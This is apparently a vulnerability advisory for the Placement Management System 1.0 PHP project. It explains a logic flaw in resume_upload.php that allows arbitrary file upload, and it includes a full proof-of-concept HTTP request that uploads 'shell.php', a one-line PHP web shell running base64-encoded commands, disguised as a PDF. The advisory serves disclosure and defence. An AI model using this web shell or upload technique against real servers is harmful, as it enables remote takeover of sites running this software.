itsourcecode
Placement Management System
1.0
Download Source Code: https://itsourcecode.com/wp-content/uploads/2021/04/Placement-Management-System-Project-In-PHP-Source-Code.zip
In the resume_upload.php page, there is filtering for uploaded images; however, the filtering logic has issues, allowing attackers to upload a webshell directly.
As shown in the code snippet of resume_upload.php below, the uploadOk variable should be set to 0 if the file uploaded by the user does not meet a certain requirement. However, when matching file extensions, uploadOk is set to 1 even if the extension is not an image. This flawed logic results in an arbitrary file upload vulnerability. The correct approach should be to immediately return an error result when any requirement is not met.
POST /resume_upload.php HTTP/1.1
Host: 192.168.17.24
Content-Length: 348
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.17.24
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytzt6oD3I6AZBwb3v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.17.24/edit_profile.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=491efd2965af14c25935ca2b5505a4f4
Connection: close
------WebKitFormBoundarytzt6oD3I6AZBwb3v
Content-Disposition: form-data; name="fileToUpload"; filename="shell.php"
Content-Type: application/pdf
<?php system(base64_decode($_GET["oops"]));?>
------WebKitFormBoundarytzt6oD3I6AZBwb3v
Content-Disposition: form-data; name="submit"
Upload Resume
------WebKitFormBoundarytzt6oD3I6AZBwb3v--